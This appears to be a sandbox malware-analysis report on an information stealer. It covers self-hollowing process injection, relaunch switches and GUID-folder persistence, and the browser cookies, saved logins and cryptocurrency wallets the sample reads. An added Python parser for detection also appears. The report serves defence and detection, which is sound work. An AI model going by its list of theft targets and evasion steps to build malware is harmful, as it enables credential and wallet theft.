Source: C:\Users\user\AppData\Local\81bc8e9b-9d47-41ad-b82b-bbc3ff54a6de\build2.exe Process created: C:\Users\user\AppData\Local\81bc8e9b-9d47-41ad-b82b-bbc3ff54a6de\build2.exe "C:\Users\user\AppData\Local\81bc8e9b-9d47-41ad-b82b-bbc3ff54a6de\build2.exe"
Source: C:\Users\user\AppData\Local\439dd104-1941-4ae6-af5f-8afc23993f7a\U59WtZz2Sg.exe Process created: C:\Users\user\AppData\Local\439dd104-1941-4ae6-af5f-8afc23993f7a\U59WtZz2Sg.exe "C:\Users\user\AppData\Local\439dd104-1941-4ae6-af5f-8afc23993f7a\U59WtZz2Sg.exe" --AutoStart
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Code function: 1_2_00419F90 GetCurrentProcess,GetLastError,GetLastError,SetPriorityClass,GetLastError,GetModuleFileNameW,PathRemoveFileSpecW,GetCommandLineW,CommandLineToArgvW,lstrcpyW,lstrcmpW,lstrcmpW,lstrcpyW,lstrcpyW,lstrcmpW,lstrcmpW,GlobalFree,lstrcpyW,lstrcpyW,OpenProcess,WaitForSingleObject,CloseHandle,Sleep,GlobalFree,GetCurrentProcess,GetExitCodeProcess,TerminateProcess,CloseHandle,lstrcatW,GetVersion,lstrcpyW,lstrcatW,lstrcatW,_memset,ShellExecuteExW,CreateThread,lstrlenA,lstrcatW,_malloc,lstrcatW,_memset,lstrcatW,MultiByteToWideChar,lstrcatW,lstrlenW,CreateThread,WaitForSingleObject,CreateMutexA,CreateMutexA,lstrlenA,lstrcpyA,_memmove,_memmove,_memmove,GetUserNameW,GetMessageW,GetMessageW,DispatchMessageW,TranslateMessage,TranslateMessage,DispatchMessageW,GetMessageW,PostThreadMessageW,PeekMessageW,PostThreadMessageW,PeekMessageW,DispatchMessageW,PeekMessageW,WaitForSingleObject,PostThreadMessageW,PeekMessageW,DispatchMessageW,PeekMessageW,WaitForSingleObject,CloseHandle, 1_2_00419F90
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Code function: GetLocaleInfoA, 0_2_0040D8D8
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Code function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtLCMapStringA,___crtLCMapStringA,___crtGetStringTypeA,_free,_free,_free,_free,_free,_free,_free,_free,_free, 1_2_0043404A
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Code function: _LcidFromHexString,GetLocaleInfoW,_TestDefaultLanguage, 1_2_00438178
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat, 1_2_00440116
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Code function: _wcscmp,_wcscmp,GetLocaleInfoW,GetLocaleInfoW,GetACP, 1_2_004382A2
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Code function: GetLocaleInfoW,_GetPrimaryLen, 1_2_0043834F
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Code function: _memset,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_GetLcidFromCountry,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,___crtDownlevelLCIDToLocaleName,___crtDownlevelLCIDToLocaleName,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,__itow_s, 1_2_00438423
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Code function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo, 1_2_004335E7
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Code function: EnumSystemLocalesW, 1_2_004387C8
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Code function: GetLocaleInfoW, 1_2_0043884E
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Code function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,_free,_free,_free,_free,_free, 1_2_00432B6D
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Code function: _TranslateName,_GetLocaleNameFromLangCountry,_GetLocaleNameFromLanguage,_TranslateName,_GetLocaleNameFromLangCountry,_GetLocaleNameFromLanguage,_GetLocaleNameFromDefault,IsValidCodePage,_wcschr,_wcschr,__itow_s,__invoke_watson,_LcidFromHexString,GetLocaleInfoW, 1_2_00437BB3
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Code function: EnumSystemLocalesW, 1_2_00437E27
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Code function: _GetPrimaryLen,EnumSystemLocalesW, 1_2_00437E83
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Code function: _GetPrimaryLen,EnumSystemLocalesW, 1_2_00437F00
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Code function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__calloc_crt,_free,__invoke_watson, 1_2_0042BF17
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Code function: _LcidFromHexString,GetLocaleInfoW,GetLocaleInfoW,__wcsnicmp,GetLocaleInfoW,_TestDefaultLanguage, 1_2_00437F83
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Code function: __calloc_crt,__malloc_crt,_free,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,_free,_free,_free,_free, 1_2_00432FAD
Source: C:\Users\user\AppData\Local\81bc8e9b-9d47-41ad-b82b-bbc3ff54a6de\build2.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\81bc8e9b-9d47-41ad-b82b-bbc3ff54a6de\build2.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\81bc8e9b-9d47-41ad-b82b-bbc3ff54a6de\build2.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Code function: 1_2_00427756 cpuid 1_2_00427756
Source: C:\Users\user\AppData\Local\81bc8e9b-9d47-41ad-b82b-bbc3ff54a6de\build2.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\AppData\Local\81bc8e9b-9d47-41ad-b82b-bbc3ff54a6de\build2.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Code function: 0_2_0040A933 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter, 0_2_0040A933
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Code function: 1_2_0042FE47 __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte, 1_2_0042FE47
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Code function: 1_2_00419F90 GetCurrentProcess,GetLastError,GetLastError,SetPriorityClass,GetLastError,GetModuleFileNameW,PathRemoveFileSpecW,GetCommandLineW,CommandLineToArgvW,lstrcpyW,lstrcmpW,lstrcmpW,lstrcpyW,lstrcpyW,lstrcmpW,lstrcmpW,GlobalFree,lstrcpyW,lstrcpyW,OpenProcess,WaitForSingleObject,CloseHandle,Sleep,GlobalFree,GetCurrentProcess,GetExitCodeProcess,TerminateProcess,CloseHandle,lstrcatW,GetVersion,lstrcpyW,lstrcatW,lstrcatW,_memset,ShellExecuteExW,CreateThread,lstrlenA,lstrcatW,_malloc,lstrcatW,_memset,lstrcatW,MultiByteToWideChar,lstrcatW,lstrlenW,CreateThread,WaitForSingleObject,CreateMutexA,CreateMutexA,lstrlenA,lstrcpyA,_memmove,_memmove,_memmove,GetUserNameW,GetMessageW,GetMessageW,DispatchMessageW,TranslateMessage,TranslateMessage,DispatchMessageW,GetMessageW,PostThreadMessageW,PeekMessageW,PostThreadMessageW,PeekMessageW,DispatchMessageW,PeekMessageW,WaitForSingleObject,PostThreadMessageW,PeekMessageW,DispatchMessageW,PeekMessageW,WaitForSingleObject,CloseHandle, 1_2_00419F90
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Code function: 0_2_00403341 GetModuleHandleW,GetNamedPipeHandleStateW,InterlockedExchange,GetConsoleAliasExesLengthW,EnumCalendarInfoW,InterlockedCompareExchange,GetConsoleTitleA,GetLogicalDriveStringsW,FlushFileBuffers,GetShortPathNameA,GetComputerNameExA,CopyFileW,CloseHandle,LoadLibraryA,InterlockedIncrement,InterlockedIncrement,GetCharWidthA,CreateNamedPipeW,WinHttpSetOption,GlobalFlags,FindFirstVolumeA,CreateJobObjectA,GetModuleHandleW,FindResourceA,GetHandleInformation,CancelTimerQueueTimer,VerifyVersionInfoA,InterlockedIncrement,GetCommandLineA,SearchPathA,WriteConsoleOutputA,GetCPInfoExW,GetBinaryTypeA, 0_2_00403341
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Code function: 0_2_0040303E BuildCommDCBAndTimeoutsA,CreateMailslotA,GetDriveTypeA,GetCurrentDirectoryW,CallNamedPipeW,MoveFileExW,SearchPathA,GetVersionExA,OpenWaitableTimerA,FindNextVolumeMountPointW,FindNextVolumeMountPointW,ReadConsoleInputA,GetLogicalDriveStringsA,CreateDirectoryExW,FindNextVolumeMountPointW,GlobalLock,GetModuleHandleA,GetWindowsDirectoryW,SetMailslotInfo,CreateFileW,AddConsoleAliasW,IsProcessInJob,GetProcessPriorityBoost,EnumCalendarInfoExA,QueryDosDeviceW,GetConsoleTitleA,FillConsoleOutputAttribute,SetVolumeLabelA,CompareStringW, 0_2_0040303E
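
The Memory written and Process created entries above describe one chain: each stage writes a buffer starting with 4D5A (the MZ header) at base 0x400000 of a process with its own image path, i.e. into a freshly spawned copy of itself, which matches the process-hollowing pattern (ATT&CK T1055.012); the loader then relaunches itself with --Admin IsNotAutoStart IsNotTask, a relocated copy under %LOCALAPPDATA%\<GUID>\ runs with --Task and --AutoStart, and build2.exe / build3.exe are started from a second GUID-named folder. The Python below is an added example, not part of this report and not Joe Sandbox code: it rebuilds the process tree from such lines, lists the PE-header writes, and names the indicators that appear in this section. Sample lines are copied from this section; the regexes assume image paths without spaces, and the indicator labels are the example's own.

```python
import re

# Added example (not Joe Sandbox code): rebuild the process tree and the
# PE-header writes from "Process created:" / "Memory written:" lines of the
# kind shown above, then name the relaunch indicators. Sample lines are copied
# from this report. Assumptions that are this example's own: image paths
# contain no spaces, and the indicator labels used below.
SAMPLE_LINES = [
    r"Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Memory written: C:\Users\user\Desktop\U59WtZz2Sg.exe base: 400000 value starts with: 4D5A",
    r"Source: C:\Users\user\AppData\Local\439dd104-1941-4ae6-af5f-8afc23993f7a\U59WtZz2Sg.exe Memory written: C:\Users\user\AppData\Local\439dd104-1941-4ae6-af5f-8afc23993f7a\U59WtZz2Sg.exe base: 400000 value starts with: 4D5A",
    r"Source: C:\Users\user\AppData\Local\81bc8e9b-9d47-41ad-b82b-bbc3ff54a6de\build2.exe Memory written: C:\Users\user\AppData\Local\81bc8e9b-9d47-41ad-b82b-bbc3ff54a6de\build2.exe base: 400000 value starts with: 4D5A",
    r"Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Process created: C:\Users\user\Desktop\U59WtZz2Sg.exe C:\Users\user\Desktop\U59WtZz2Sg.exe",
    r'Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Process created: C:\Users\user\Desktop\U59WtZz2Sg.exe "C:\Users\user\Desktop\U59WtZz2Sg.exe" --Admin IsNotAutoStart IsNotTask',
    r"Source: C:\Users\user\AppData\Local\439dd104-1941-4ae6-af5f-8afc23993f7a\U59WtZz2Sg.exe Process created: C:\Users\user\AppData\Local\439dd104-1941-4ae6-af5f-8afc23993f7a\U59WtZz2Sg.exe C:\Users\user\AppData\Local\439dd104-1941-4ae6-af5f-8afc23993f7a\U59WtZz2Sg.exe --Task",
    r'Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Process created: C:\Users\user\AppData\Local\81bc8e9b-9d47-41ad-b82b-bbc3ff54a6de\build2.exe "C:\Users\user\AppData\Local\81bc8e9b-9d47-41ad-b82b-bbc3ff54a6de\build2.exe"',
    r'Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Process created: C:\Users\user\AppData\Local\81bc8e9b-9d47-41ad-b82b-bbc3ff54a6de\build3.exe "C:\Users\user\AppData\Local\81bc8e9b-9d47-41ad-b82b-bbc3ff54a6de\build3.exe"',
    r'Source: C:\Users\user\AppData\Local\439dd104-1941-4ae6-af5f-8afc23993f7a\U59WtZz2Sg.exe Process created: C:\Users\user\AppData\Local\439dd104-1941-4ae6-af5f-8afc23993f7a\U59WtZz2Sg.exe "C:\Users\user\AppData\Local\439dd104-1941-4ae6-af5f-8afc23993f7a\U59WtZz2Sg.exe" --AutoStart',
]

_PROC_RE = re.compile(r"^Source:\s+(?P<parent>\S+)\s+Process created:\s+(?P<child>\S+)\s*(?P<cmdline>.*)$")
_MEM_RE = re.compile(r"^Source:\s+(?P<writer>\S+)\s+Memory written:\s+(?P<target>\S+)\s+base:\s+"
                     r"(?P<base>[0-9A-Fa-f]+)\s+value starts with:\s+(?P<magic>[0-9A-Fa-f]+)")
# %LOCALAPPDATA%\<GUID>\ as used for the relocated copy and the second stage
_GUID_DIR_RE = re.compile(r"\\AppData\\Local\\[0-9a-f]{8}(?:-[0-9a-f]{4}){3}-[0-9a-f]{12}\\", re.I)
# Command-line switches exactly as they appear in this report
_SWITCHES = ("--Admin IsNotAutoStart IsNotTask", "--Task", "--AutoStart")


def build_tree(lines):
    """Map each parent image path to the list of (child image, command line) it spawned."""
    tree = {}
    for line in lines:
        m = _PROC_RE.match(line.strip())
        if m:
            tree.setdefault(m["parent"], []).append((m["child"], m["cmdline"].strip()))
    return tree


def injection_events(lines):
    """Memory writes that place a PE header (MZ = 4D5A) at a target process's image base."""
    events = []
    for line in lines:
        m = _MEM_RE.match(line.strip())
        if not m:
            continue
        events.append({
            "writer": m["writer"],
            "target": m["target"],
            "base": int(m["base"], 16),
            "pe_header": m["magic"].upper().startswith("4D5A"),
            # writer and target share an image path: a new instance of the same
            # executable is being overwritten (self-hollowing), not a third party
            "same_image": m["writer"].lower() == m["target"].lower(),
        })
    return events


def relaunch_indicators(lines):
    """Command-line and path indicators of the relaunch chain seen in this report."""
    found = set()
    for parent, children in build_tree(lines).items():
        for child, cmdline in children:
            if child.lower() == parent.lower():
                found.add("self-relaunch")
            for switch in _SWITCHES:
                if cmdline.endswith(switch):
                    found.add(switch)
            if _GUID_DIR_RE.search(child):
                found.add("payload under %LOCALAPPDATA%\\<GUID>\\")
            if re.search(r"\\build[23]\.exe$", child, re.I):
                found.add("build2/build3 second stage")
    return found


def render(tree, root):
    """Indented text view of the tree; a child with the same image as its parent is not descended into."""
    out = []

    def walk(node, depth):
        out.append("  " * depth + node)
        for child, cmdline in tree.get(node, []):
            out.append("  " * (depth + 1) + "-> " + (cmdline or child))
            if child.lower() != node.lower():
                walk(child, depth + 2)

    walk(root, 0)
    return "\n".join(out)


if __name__ == "__main__":
    tree = build_tree(SAMPLE_LINES)
    print(render(tree, r"C:\Users\user\Desktop\U59WtZz2Sg.exe"))
    for ev in injection_events(SAMPLE_LINES):
        print(f"PE written into {ev['target']} at {ev['base']:#x} (same image: {ev['same_image']})")
    print(sorted(relaunch_indicators(SAMPLE_LINES)))
```

For detection engineering the two usable signals are independent of the sample's hashes: a process creating a child with its own image path and then writing into that child's image base, and a copy of a user-launched executable running from a GUID-named folder directly under %LOCALAPPDATA% with --Task or --AutoStart on its command line.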

Stealing of Sensitive Information

Source: Yara match File source: 5.3.U59WtZz2Sg.exe.3060000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.0.mstsca.exe.ee0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.mstsca.exe.ee0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.build3.exe.b90000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.0.build3.exe.b90000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000005.00000003.362157229.0000000003060000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\build3[1].exe, type: DROPPED
Source: Yara match File source: 10.0.build2.exe.400000.9.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.0.build2.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.0.build2.exe.400000.10.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.0.build2.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.build2.exe.20d15a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.0.build2.exe.400000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.0.build2.exe.400000.9.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.0.build2.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.0.build2.exe.400000.10.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.0.build2.exe.400000.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.0.build2.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.build2.exe.20d15a0.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.0.build2.exe.400000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.0.build2.exe.400000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000A.00000000.347600742.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.350956103.00000000020D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000000.369240104.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000000.347031103.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000000.347942903.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000000.347322735.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: C:\Users\user\AppData\Local\81bc8e9b-9d47-41ad-b82b-bbc3ff54a6de\build2.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Users\user\AppData\Local\81bc8e9b-9d47-41ad-b82b-bbc3ff54a6de\build2.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\user\AppData\Local\81bc8e9b-9d47-41ad-b82b-bbc3ff54a6de\build2.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\AppData\Local\81bc8e9b-9d47-41ad-b82b-bbc3ff54a6de\build2.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\81bc8e9b-9d47-41ad-b82b-bbc3ff54a6de\build2.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\???X
Source: C:\Users\user\AppData\Local\81bc8e9b-9d47-41ad-b82b-bbc3ff54a6de\build2.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\???X
Source: C:\Users\user\AppData\Local\81bc8e9b-9d47-41ad-b82b-bbc3ff54a6de\build2.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\???X
Source: C:\Users\user\AppData\Local\81bc8e9b-9d47-41ad-b82b-bbc3ff54a6de\build2.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\???X
Source: C:\Users\user\AppData\Local\81bc8e9b-9d47-41ad-b82b-bbc3ff54a6de\build2.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\???X
Source: C:\Users\user\AppData\Local\81bc8e9b-9d47-41ad-b82b-bbc3ff54a6de\build2.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\???X
Source: C:\Users\user\AppData\Local\81bc8e9b-9d47-41ad-b82b-bbc3ff54a6de\build2.exe File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\???X
Source: C:\Users\user\AppData\Local\81bc8e9b-9d47-41ad-b82b-bbc3ff54a6de\build2.exe File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\???X
Source: C:\Users\user\AppData\Local\81bc8e9b-9d47-41ad-b82b-bbc3ff54a6de\build2.exe File opened: C:\Users\user\AppData\Roaming\MultiDoge\???X
Source: C:\Users\user\AppData\Local\81bc8e9b-9d47-41ad-b82b-bbc3ff54a6de\build2.exe File opened: C:\Users\user\AppData\Roaming\MultiDoge\???X
Source: C:\Users\user\AppData\Local\81bc8e9b-9d47-41ad-b82b-bbc3ff54a6de\build2.exe File opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\???X
Source: C:\Users\user\AppData\Local\81bc8e9b-9d47-41ad-b82b-bbc3ff54a6de\build2.exe File opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\???X
Source: C:\Users\user\AppData\Local\81bc8e9b-9d47-41ad-b82b-bbc3ff54a6de\build2.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\
Source: C:\Users\user\AppData\Local\81bc8e9b-9d47-41ad-b82b-bbc3ff54a6de\build2.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Source: C:\Users\user\AppData\Local\81bc8e9b-9d47-41ad-b82b-bbc3ff54a6de\build2.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Source: C:\Users\user\AppData\Local\81bc8e9b-9d47-41ad-b82b-bbc3ff54a6de\build2.exe File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\
Source: C:\Users\user\AppData\Local\81bc8e9b-9d47-41ad-b82b-bbc3ff54a6de\build2.exe File opened: C:\Users\user\AppData\Roaming\MultiDoge\
Source: C:\Users\user\AppData\Local\81bc8e9b-9d47-41ad-b82b-bbc3ff54a6de\build2.exe File opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\
Source: C:\Users\user\AppData\Local\81bc8e9b-9d47-41ad-b82b-bbc3ff54a6de\build2.exe Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Configuration
Source: Yara match File source: 0000000A.00000000.378213612.0000000000627000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY

Remote Access Functionality

Source: Yara match File source: 10.0.build2.exe.400000.9.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.0.build2.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.0.build2.exe.400000.10.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.0.build2.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.build2.exe.20d15a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.0.build2.exe.400000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.0.build2.exe.400000.9.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.0.build2.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.0.build2.exe.400000.10.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.0.build2.exe.400000.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.0.build2.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.build2.exe.20d15a0.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.0.build2.exe.400000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.0.build2.exe.400000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000A.00000000.347600742.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.350956103.00000000020D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000000.369240104.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000000.347031103.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000000.347942903.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000000.347322735.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY